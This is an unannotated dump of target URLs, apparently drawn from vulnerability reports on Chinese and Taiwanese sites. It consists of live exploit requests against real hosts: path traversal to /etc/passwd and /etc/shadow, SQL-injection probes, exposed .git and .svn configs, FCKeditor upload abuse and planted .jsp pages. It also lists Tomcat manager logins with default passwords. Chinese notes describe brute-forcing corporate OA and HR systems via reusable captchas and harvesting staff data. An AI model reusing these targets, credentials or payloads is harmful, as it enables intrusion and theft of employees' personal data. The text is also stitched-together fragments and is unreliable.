http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 http://**.**.**/wxcs/sys/loginInput.action http://wificfm.haierubic.com:56688/wificfm/main.html http://kf.liantongcar.com/ http://hyt.mama100.com/hyt/sttlOrderActionviewOrderDetails.action?id=50214097 http://www.35.com http://114.251.242.177/login.jsp pgsd.sysu.edu.cn/guoneijiaoliufinal.asp?id=1721 http://61.148.212.50/Admin/Index/index http://118.213.88.152/ url:http://116.3.0.65:80/manager/html user:admin pass:admin http://v.6.cn/crossdomain.xml http://v.6.cn/user/im/list.php http://v.6.cn/user/im/imMsgLogs.php?tuid=53646313 http://jeary.org/flashCSRF/ContentHijacking.html?objfile=http://jeary.org/flashCSRF/objects/ContentHijacking.swf&objtype=flash&target=http://v.6.cn/user/im/list.php http://jeary.org/flashCSRF/ContentHijacking.html?objfile=http://jeary.org/flashCSRF/objects/ContentHijacking.swf&objtype=flash&target=http://v.6.cn/user/liveorder.php http://gushen.91jinrong.com/bz/index.htm http://www.boqii.com/userinfo/Order/ajaxDelOrder/id/19457540 http://bbs.tompda.com/sendmsg.php?uid=0&tid=2210902&pageid=1&pid=3587934 http://zidian.aies.cn/?id=MzM2OQ== http://cidian.aies.cn/ http://117.57.64.165:1980/Login.action存在命令执行漏洞 url:http://124.238.218.230:80/manager/html user:admin http://www.xbiao.com/compare/ajaxmode?series_id=1169 url:http://218.17.251.228:80/manager/html user:admin pass:admin http://61.138.121.108:8044/yashanmis/xt/login.action存在命令执行漏洞 url:http://219.143.242.95:80/manager/html user:tomcat pass:tomcat http://**.**.**.**/SecondPages/RightInfoList.aspx?InfoType=InfoZWGK1_TZGG http://**.**.**.**/SecondPages/RightInfoList.aspx?InfoType=InfoZXJJ_QKJJ http://**.**.**.**/fabu/SecondPages/RightInfoList.aspx?InfoType=infogrb_fwbb http://**.**.**.**/OutPortal_CFD/SecondPages/RightInfoList.aspx?InfoType=infoMLCFD http://118.114.245.44:211/login.aspx?ReturnUrl=%2fYHBSignContractRequest.aspx http://118.114.245.44:211 http://www.cnmo.com/docVote.php http://218.3.140.105/spims/out/login.action命令执行漏洞 lI4y0:15953:0:99999:7 http://www.helloan.cn/process/lend/bids http://www.helloan.cn/process/lend/b http://www.leyou.com.cn/special/promotion/2014/06/mobile-leyou/index http://oa.cnhxcc.com.cn,此处验证码可重用,用常用用户名获得某个账号,进行登陆后,里面含有公司人员通讯录和不少内部资料,用获取的邮箱进行fuzzing,可获得某个登陆数字档案管理系统的账号,进入后里面含有不少敏感资料。 http://www.nxqmcy.gov.cn/web.do?reqCode=docList&type_id=001001005001 http://121.8.226.112:443/gzdms/enterprise/login.action存在命令执行漏洞 url:http://124.128.69.182:80/manager/html user:admin pass:admin http://222.197.183.145/web/dorm/net/login.do http://wechat.m.xywy.com/Index/index/area/2 http://wechat.m.xywy.com/Index/index/area/2%27%20and%20%271%27%20=%20%271 http://wechat.m.xywy.com/Index/index/area/2%27%20and%20%271%27%20=%20%272 http://www.suningcloud.com/ http://www.suningcloud.com/account/getSubCustInfo.htm?subCustId=1XXX www.suningcloud.com http://61.183.9.80/login.action存在命令执行漏洞 http://211.90.246.57/webagent/files/login.jsp https://mail.eyou.net/ http://**.**.**.**/news_info.php?keyno=23 http://**.**.**.**/news_info.php?keyno=206 http://**.**.**.**/news_info.php?keyno=12 http://**.**.**.**/news_info.php?keyno=9 http://**.**.**.**/news_info.php?keyno=42 http://**.**.**.**/news_info.php?keyno=11 http://**.**.**.**/news_info.php?keyno=7 http://**.**.**.**/news_info.php?keyno=14 http://**.**.**.**/news_info.php?keyno=239 http://**.**.**.**/news_info.php?keyno=1 http://**.**.**.**/newsinfo.php?keyno=85 http://**.**.**.**/news_info.php?keyno=11 http://**.**.**.**/newsinfo.php?keyno=10 http://**.**.**.**/news_info.php?keyno=17 http://**.**.**.**/news_info.php?keyno=10 http://**.**.**.**/news_info.php?keyno=11 http://**.**.**.**/news_info.php?keyno=10 http://**.**.**.**/news_info.php?keyno=23 http://**.**.**.**/news_info.php?keyno=11 http://**.**.**.**/news_info.php?keyno=14 http://**.**.**.**/news_info.php?keyno=299 http://**.**.**.**/news_info.php?keyno=24 http://**.**.**.**/news_info.php?keyno=18 http://**.**.**.**/news_info.php?keyno=6 http://**.**.**.**/news_info.php?keyno=10 http://**.**.**.**/news_info.php?keyno=16 http://**.**.**.**/news_info.php?keyno=31 http://**.**.**.**/news_info.php?keyno=16 http://**.**.**.**/news_info.php?keyno=25 http://**.**.**.**/news_info.php?keyno=1 http://**.**.**.**/news_info.php?keyno=3 http://**.**.**.**/newsinfo.php?keyno=8 http://**.**.**.**/newsinfo.php?keyno=15 http://**.**.**.**/newsinfo.php?keyno=83 http://**.**.**.**/newsinfo.php?keyno=24 http://**.**.**.**/newsinfo.php?keyno=8 http://**.**.**.**/newsinfo.php?keyno=56 http://**.**.**.**/newsinfo.php?keyno=5 http://**.**.**.**/newsinfo.php?keyno=77 http://**.**.**.**/newsinfo.php?keyno=4 http://**.**.**.**/newsinfo.php?keyno=167 http://**.**.**.**/newsinfo.php?keyno=22 http://**.**.**.**/newsinfo.php?keyno=262 http://**.**.**.**/newsinfo.php?keyno=16 http://**.**.**.**/newsinfo.php?keyno=5 http://**.**.**.**/newsinfo.php?keyno=270 http://**.**.**.**/newsinfo.php?keyno=61 http://**.**.**.**/newsinfo.php?keyno=139 http://**.**.**.**/newsinfo.php?keyno=11 http://**.**.**.**/newsinfo.php?keyno=6 http://**.**.**.**/newsinfo.php?keyno=59 http://**.**.**.**/newsinfo.php?keyno=163 http://**.**.**.**/newsinfo.php?keyno=34 http://**.**.**.**/product_info.php?keyno=52720 http://**.**.**.**/Product_info.php?keyno=62585 http://**.**.**.**/product_info.php?keyno=55132 http://**.**.**.**/Product_info.php?keyno=34460 http://**.**.**.**/product_info.php?keyno=13234 http://**.**.**.**/product_info.php?keyno=65025 http://**.**.**.**/product_info.php?keyno=64661 http://**.**.**.**/product_info.php?keyno=13946 http://**.**.**.**/product.php?parentcode=101&classcode=&page=1 http://**.**.**.**/product.php?parentcode=101&classcode=&page=1 http://**.**.**.**/product.php?parentcode=123&classcode=&page=1 http://**.**.**.**/product.php?parentcode=101&classcode=&page=1 http://**.**.**.**/product.php?parentcode=101&classcode=&page=1 http://124.239.192.65/erp/shadmin/editpage/Admin_Login.asp?action=login http://124.239.192.65/zsjy/zpxx_0.asp?news_id=1 http://www.xlmwifi.com/sellerad/index.php?m=Home&c=Login&a=admin http://dt.syyx.com/login.aspx syyx:syyx http://124.239.192.63 http://shop.xiamenair.com/prolist.aspx?k=a http://shop.xiamenair.com com:8080/ztyb/index.htm http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**//OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**:8888/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**:81/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**:89/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**:8000/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**//OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**//OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**//OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**:43651/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**//OpenWindows/Openleibie_wtMc.aspx?id= http://221.237.157.190/epp/html/nodes/upload/SupdocDo.jsp?areaname=1&supdocname=1&pk_singleplan=1 http://61.175.97.50//epp/html/nodes/upload/SupdocDo.jsp?areaname=1&supdocname=1&pk_singleplan=1 http://218.75.95.158:8081//epp/html/nodes/upload/SupdocDo.jsp?areaname=1&supdocname=1&pk_singleplan=1 http://pr.landsea.cn:9080//epp/html/nodes/upload/SupdocDo.jsp?areaname=1&supdocname=1&pk_singleplan=1 http://123.232.105.202/epp/html/nodes/upload/SupdocDo.jsp?areaname=1&supdocname=1&pk_singleplan=1 http://erp.suning.com.cn/epp/html/nodes/upload/SupdocDo.jsp?areaname=1*&supdocname=1&pk_singleplan=1 http://activecard.zsins.com:7011/iss_dbwebins/bs/bsPrdController.do?method=getPrdouKindList http://activecard.zsins.com:7011/iss_dbwebins/servlet/FileLookServlet?upfileurl=/home/weblogic/webapps/ZheShang/image/6007.jpg http://activecard.zsins.com:7011/iss_dbwebins/servlet/FileLookServlet?upfileurl=/etc/passwd http://www.sdxhsd.com.cn/news/newsDetail.jsp?id=1500035 http://www.baihui.com/.svn/entries http://bjadmin.95081.com/.svn/entries http://driver.95081.com/.svn/entries http://daijia.95081.com/.svn/entries http://ychadmin.95081.com/.svn/entries http://123.57.34.173 http://123.57.34.173/myup.aspx(查看源代码) http://123.57.34.173/22.aspx http://www.163disk.com/ https://cos.sfbest.com http://www.firstniu.com/Article/index/id/1.html http://www.weiboyi.com/.svn/entries http://222.221.240.84:7001/ynbi/vfs/public/portals/login/html/login.html http://222.221.240.84:7001/manager/html http://222.221.240.83:7001/ynbi/vfs/public/portals/login/html/login.html http://222.221.240.83:7001/manager/html jdbc:oracle:thin:@172.16.2.50:1521:orcl http://222.221.240.85:8083/Main/AspCode/ZhuChengXu/Login.aspx http://mzw.anquanxia.com/?action=public&opt=login http://ufsdp.ufida.com/(用友集团开发管理部YSDP平台) http://ptcms.csdn.net/article/service/article_count?aid=2819257&jsonpcallback=?&preview=1 http://**.**.**/admin/ http://xp.umeng.com//WEB-INF/classes/springbeans-umeng-dataSource.xml http://xp.umeng.com//WEB-INF/spring/root-context.xml http://xp.umeng.com//WEB-INF/classes/rabbitmq.xml http://xp.umeng.com//WEB-INF/classes/umeng-sso.xml www.fxiaoke.com/h/home/admin www.ycg.com.cn。企业账号可能就是ycg。 www.fxiaoke.com/XV/User/Login员工登陆,可以下载企业文件等等。 http://qqpet.wapsns.3g.qq.com/qqpet/fcgi-bin/invite?sid=xxx www.beva.com/czh/tag/我是注入点 http://city.vivo.com.cn/pc/CheckAll.aspx?actiontype=MoreUpload&pageindex= http://shake.sd.chinamobile.com:18001/console http://205.177.226.84/axis2/ http://www.openimslive.com/axis2/ com:9003 http://www.hengyang.jcy.gov.cn www.csp.gov.cn http://www.huakui.cc www.tyx.cc www.jxedu.cc www.wowoniu.cc www.5558.biz http://www.qdyjkc.com www.qyggzyjy.cn/ http://124.239.192.62/ http://sr.cnooc.com.cn/ http://fk.cscec.com/ http://**.**.**.**/ http://**.**.**.**/emlib4/system/DataSource/DownloadImage.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadImage.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadImage.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadImage.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadHtml.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadHtml.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadHtml.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadHtml.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_xxxx.aspx?ruid=A36E363005A710001 http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_xxxx.aspx?ruid=A36E363005A710001 http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_xxxx.aspx?ruid=A36E363005A710001 http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_xxxx.aspx?ruid=A36E363005A710001 http://**.**.**.**/emlib4/format/release/aspx/JOURNALS_xxxx.aspx?ruid=d8fbf2b00122e00ea http://**.**.**.**/emlib4/format/release/aspx/JOURNALS_xxxx.aspx?ruid=d8fbf2b00122e00ea http://**.**.**.**/emlib4/format/release/aspx/JOURNALS_xxxx.aspx?ruid=d8fbf2b00122e00ea http://**.**.**.**/emlib4/format/release/aspx/JOURNALS_xxxx.aspx?ruid=d8fbf2b00122e00ea http://**.**.**.**/emlib4/format/release/aspx/EML_LANGUAGEL_xxxx.aspx?ruid=A36E43801379B0001 http://**.**.**.**/emlib4/format/release/aspx/EML_LANGUAGEL_xxxx.aspx?ruid=A36E43801379B0001 http://**.**.**.**/emlib4/format/release/aspx/EML_LANGUAGEL_xxxx.aspx?ruid=A36E43801379B0001 http://**.**.**.**/emlib4/format/release/aspx/EML_LANGUAGEL_xxxx.aspx?ruid=A36E43801379B0001 http://**.**.**.**/emlib4/format/release/aspx/disk_xxxx.aspx?RUID=d8a532700259b00ea&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/disk_xxxx.aspx?RUID=d8a532700259b00ea&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/disk_xxxx.aspx?RUID=d8a532700259b00ea&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/disk_xxxx.aspx?RUID=d8a532700259b00ea&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/EML_VIDEO_XXXX.aspx?RUID=17e5b316001412011e&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/EML_VIDEO_XXXX.aspx?RUID=17e5b316001412011e&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/EML_VIDEO_XXXX.aspx?RUID=17e5b316001412011e&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/EML_VIDEO_XXXX.aspx?RUID=17e5b316001412011e&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/eml_arts_xxxx.aspx?RUID=1ad97215004c5f011e&desktopID=1bff19620000ad011e http://**.**.**.**/emlib4/format/release/aspx/eml_arts_xxxx.aspx?RUID=1ad97215004c5f011e&desktopID=1bff19620000ad011e http://**.**.**.**/emlib4/format/release/aspx/eml_arts_xxxx.aspx?RUID=1ad97215004c5f011e&desktopID=1bff19620000ad011e http://**.**.**.**/emlib4/format/release/aspx/eml_arts_xxxx.aspx?RUID=1ad97215004c5f011e&desktopID=1bff19620000ad011e http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_xxxx.aspx?RUID=1c11e03b00012fc351&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_xxxx.aspx?RUID=1c11e03b00012fc351&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_xxxx.aspx?RUID=1c11e03b00012fc351&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_xxxx.aspx?RUID=1c11e03b00012fc351&wndType=N&desktopID=uncreated www.ie.wh.sdu.edu.cn/download.jsp?filename=../download.jsp&realname=download.jsp www.ie.wh.sdu.edu.cn/download.jsp?filename=../WEB-INF/web.xml&realname=web.xml www.ie.wh.sdu.edu.cn/download.jsp?filename=../../../../../../../../../../../../../../root/.bash_history&realname=bash_history www.ie.wh.sdu.edu.cn/download.jsp?filename=../../../../../../../../../../../../../../etc/passwd&realname=passwd www.ie.wh.sdu.edu.cn/download.jsp?filename=../../../../../../../../../../../../../../etc/shadow&realname=shadow http://passport.weibo.com/visitor/visitor?a=restore&cb=?&from=weibo&_rand=0.7968236310407519 www.kuwo.cn http://tongji.unihr.cn/ http://**.**.**.**:6088/Edit/editor/fckeditor.html http://**.**.**.**/Edit/editor/fckeditor.html http://**.**.**.**:801//Edit/editor/fckeditor.html http://**.**.**.**/Edit/editor/fckeditor.html http://**.**.**.**:801/Edit/editor/fckeditor.html http://www.joycloud.cn/ http://www.joycloud.cn:81/ www.fxiaoke.com http://www.fxiaoke.com admin:service=DeploymentFileRepository https://**.**.**.**:8000/wooyun/woo.jsp https://**.**.**.**:8000/is/index.jsp http://faqservice.ztems.com/ZTEFaqMobile/FAQService.action: http://test.home.sudiyi.cn/ https://111.205.237.129/por/login_psw.csp?rnd=012044611216487144 http://服务器地址/config/config_manage/leak_location http://服务器地址/config/config_manage/leak_location http://article.zol.com.cn/admin/index1.php http://article.zol.com.cn/admin/module_ajax.php?id=1&val=373* http://mail2.myhostadmin.net:8090//login.php?showid= http://mail2.myhostadmin.net//login.php?showaddr=1 http://tc.homelink.com.cn/Login.aspx http://221.10.127.22/ http://bsm.sdidc.com.cn/ http://gkcf.dzwww.com/WEB-INF/web.xml http://gkcf.dzwww.com/WEB-INF/applicationContext.xml http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**//managerProductDetail.do?productid=9950004 http://**.**.**.**//managerProductDetail.do?productid=9950004 http://**.**.**.**//managerProductDetail.do?productid=9950004 http://**.**.**.**//managerProductDetail.do?productid=9950004 http://**.**.**.**/admin//managerProductDetail.do?productid=9950004 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 https://github.com/ http://113.31.81.147:8000/phpinfo.php http://yum.uxin.com/centos/ http://vps2.uxin.com/icons/ http://113.31.81.147:8002/admin/ http://pay.uxin.com/test.php http://apitest.uxin.com/test.html http://int.variflight.com:80/ http://**.**.**.**/salelist.jsp?infoid=16&type=L&applyid=-1 http://**.**.**.**:9080/salelist.jsp?infoid=16&type=L&applyid=-1 http://**.**.**.**:8000/salelist.jsp?infoid=16&type=L&applyid=-1 http://**.**.**.**/salelist.jsp?infoid=16&type=L&applyid=-1 http://api.iqegg.com/interface.php?m=user&a=login http://www.khfdc.com/map/Common.aspx http://www.tgfgj.com/map/Common.aspx http://www.lhfgc.gov.cn/map/Common.aspx http://www.jxxjfgj.cn/map/Common.aspx http://www.afxfdc.cn/map/Common.aspx http://www.fyxfgj.com/map/Common.aspx http://ey1linktrace.ctrip.com ip:222.73.109.101 http://www.cscec.com/,点击右上角的“办公信息系统”进行登陆,此处验证码可重用,可用猪猪侠的常用用户名获取有效账号。网址二:http://oa.cscec.com/extcomponent/security/loginnoredirect.jsp,此处左下角提示可用移动端进行登陆,移动端地址为:http://oa.cscec.com/cscecPhone/,此处根本无验证码,可直接进行爆破,密码与网址一登陆处通用。用某个账号登陆后,可进入邮箱,进入工作台,查看公司通讯录,爬取邮箱名,将用户名再做成字典,又可跑出不少账号。网址三:http://cscec-hr1.cscec.com.cn:8080/templates/index/employLogon.jsp,此为人力资源系统网站,此处虽然不能直接从办公信息系统进行登陆,但是此处验证码是可以重用的,用之前爬取用户名进行爆破,获得二百多个有效账号,里面包括很多敏感信息,有个人身份信息、家庭人员信息、个人培训经历、薪资等等,权限高的账号还可以查看其他所有人员信息(看到了易军副部长、官庆董事长信息)。 http://www.wom186.com:10002/ http://www.wom186.com:10002/UserFiles/File/aimei1.jsp http://www.wom186.com:10002/UserFiles/File/aimei2.jsp jdbc:oracle:thin:@130.30.15.31:1528:oraacc http://www.guoli.com/ http://www.guoli.com/renwen/index.php?&longterm=1&sp1=0 http://www.isec.ac.cn/ http://www.isec.ac.cn/admin/login.aspx http://www.isec.ac.cn/fckeditor/editor/dialog/fck_about.html http://www.myhack58.com/Article/html/3/62/2012/33638.htm http://www.t00ts.net/post-29.html http://www.isec.ac.cn/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.isec.ac.cn/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp http://www.isec.ac.cn/fckeditor/editor/filemanager/browser/default/browser.html http://www.isec.ac.cn/fckeditor/editor/filemanager/connectors/test.html www.dslrpark.com www.test.com http://**.**.**/login.php http://baoxian.cnair.com/ http://print.cnair.com/ http://218.4.112.226 http://218.4.112.226/GiantHopePage/Index.aspx http://218.4.112.226/GiantHopePage/Logintest.aspx www.kfedu.com.cn/开封教育网-new_20150403_2.rar http://sfzx.hbust.com.cn/admin/admin_login.asp admin:admin888 http://sfzx.hbust.com.cn/x.asp http://www.fcbayern.cn/ http://www.fcbayern.cn/admin http://www.fcbayern.cn/auth/login http://211.138.17.17:8081/ http://211.138.17.17:8081/hacnms/control/update?_ENTITY=UserLogin&userLoginId=admin&CHANGE_PASSWORD=Y¤tPassword=admin&checkPassword=admin url:http://lshr.lishui.gov.cn/Article/ArticleNews1.aspx?TypeIDLv2=27 http://edu.shm.com.cn/txy/article/news?departmentId=6 http://edu.shm.com.cn/edu/train/index?Train[name]=&Train[categoryid]=2%27&Train[price]=&Train[areaid]=&Train[updatetime]=&yt0=----Train[categoryid]- http://app1.iqegg.com/.git/config http://api.iqegg.com/.git/config http://app1.iqegg.com/show.php?devid=386c661b6208 http://app1.iqegg.com/mqtt/index.php http://www.younglight.com.cn/ http://www.younglight.com.cn/ps/moa/userlogin.jsp http://**.**.**.**:8001//paper/forget1.jsp http://**.**.**.**:8080//paper/forget1.jsp http://**.**.**.**:8001/paper/forget1.jsp http://itjuzi.com/investevents?scope=115&sub_scope=116 http://itjuzi.com/investscope?type=invsp&id=1 http://itjuzi.com/.svn/entries http://itjuzi.com/images/.svn/entries http://itjuzi.com/images/.DS_Store http://sh.itjuzi.com/.svn/entries http://today.itjuzi.com/.git/config http://www.yy110.gov.cn/components/upload/uploadWindow.jsp?randomId= http://www.yy110.gov.cn//upload/20150704/1435958522281.jsp http://121.28.7.114/index.aspx http://121.28.7.114/Images/ http://121.28.7.114/attach/ http://121.28.7.114/scripts/ http://121.28.7.114/css/ http://121.28.7.114/admin/test.aspx http://121.28.7.114/attach/,此页面可下载网站备份文件 http://121.28.7.114/attach/ https://ssl.mail.163.com/config/mobileconfig/index http://blog.19ued.com/ http://blog.19ued.com/?author=1 http://blog.19ued.com/?author=100 http://www.114best.com/ip/114.aspx?w=61.146.178.37 http://www.cndns.com/members/getpass.aspx http://www.qiye001.com/ http://61.50.166.36/b2b/web/four/indexinfoAction.do?actionType=aboutUs http://61.50.166.36/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=application/octet-stream&fjbh=web&fjml=/fileuploadsave/SCFBXX/../../WEB-INF/ http://61.50.166.36/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../../ http://120.204.199.54/login http://221.7.54.196:90 http://221.7.54.196:90/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=application/octet-stream&fjbh=web&fjml=/fileuploadsave/SCFBXX/../../WEB-INF/ http://www.mail2000.com.tw/官網底下找到了試用帳號 http://221.180.145.206/ http://sysjt.lnmobilepay.com:8002/mpsweb/ http://www.12556633.com/sysadmin/login.aspx http://203.90.140.115/logonAction.do http://203.90.140.115/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=application/octet-stream&fjbh=web&fjml=/fileuploadsave/SCFBXX/../../WEB-INF/ http://203.90.140.115/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../../ http://**.**.**.** http://**.**.**.**/goa/Jhsoft.Web.login/NewView.aspx?ID=1104 http://**.**.**.**:8012/c6/Jhsoft.Web.login/NewView.aspx?ID=1104 http://**.**.**.**:8080/c6/Jhsoft.Web.login/NewView.aspx?ID=1030 http://**.**.**.**/c6/JHSoft.Web.Login/NewCList.aspx?ID=7 http://**.**.**.**:8012/c6/Jhsoft.Web.login/NewCList.aspx?id=115 http://**.**.**.**/C6/JHSoft.Web.Login/NewCView.aspx?ID=1059 http://**.**.**.**:8012/c6/Jhsoft.Web.login/NewCView.aspx?ID=1002 http://**.**.**.**:8080/c6/Jhsoft.Web.login/NewCView.aspx?ID=1030 http://99dai.cn/backPassWord.aspx http://99dai.cn/backPassWord.aspx重置,随便重置个,就重置99贷这个用户吧 http://220.181.69.19:8080/ http://www.nju.edu.tw/njpb/shownews.aspx?id=9 http://video.ee.ntu.edu.tw/.git/config http://www.cust.edu.tw http://isv.chinac.com/index_toParam.action?urlParam=../../../WEB-INF/web.xml%3f http://www.jj.hc360.com/wp-content/plugins/db-backup/download.php?file=/etc/passwd http://www.jj.hc360.com/wp-content/plugins/db-backup/download.php?file=/usr/local/apache2/htdocs/wp-config.php http://www.108.com.tw/main04/members/search_members_childminder_list.php?Cid=7&CCid=82 http://116.213.100.71/ http://server1.cdce.cn/ http://server2.cdce.cn/ http://www.fxiaoke.com/H/Account/MobileBinding/ http://www.fxiaoke.com/H/Account/MobileBinding/ http://**.**.**/login.aspx http://www.chinacoal-ins.com/ http://218.26.255.213/ http://61.50.166.36/logonAction.do http://61.50.166.36/console http://61.191.45.240/Logout http://www.zjzx.ah.cn/manage-webapp/pay/manage/order.action http://pm.weaver.cn:9085/main/login.jsp http://www.shzfcg.gov.cn:8090/new_web/cjxx/contact_operator.jsp?operator_no=157 http://www.shzfcg.gov.cn:8090/ne http://sqlmap.org http://wooyun.org/bugs/wooyun-2010-075628中注入点一样 http://zz.speiyou.com/search/index/subject:/grade:9/level:bx/term:/gtype:time inurl:a.120ask.com/&email= http://a.120ask.com/askregshow?fromUrl=aHR0cDovL3d3dy4xMjBhc2suY29tLw==&showtype=0&usertype=1&v=a7a1d8cf9ce842b8b4f7b8f3d82dc8b3&email=kkkiujghh@126.com&id=58684216&code=815969&username=kkkiujghh http://a.120ask.com/askregshow?fromUrl=aHR0cDovL3d3dy4xMjBhc2suY29tLw==&showtype=2&usertype=1&v=c9795b0d2fb2739fc1409e898def18a9&email=466196038@qq.com&id=58642925&code=492376&username=ask5864292597 http://www.xnjz.com/adminweb/js/kindeditor/attached/file/20150705/20150705020033_6324.htm这是黑页!后台http://www.xnjz.com/adminweb http://www.easelandhotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 aihotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 baohonghotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 baolilai-hotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 bmgcn.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 chinameetings.cn/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 dehan.test.dossm.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 devpaytmpl3v15.test.dossm.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 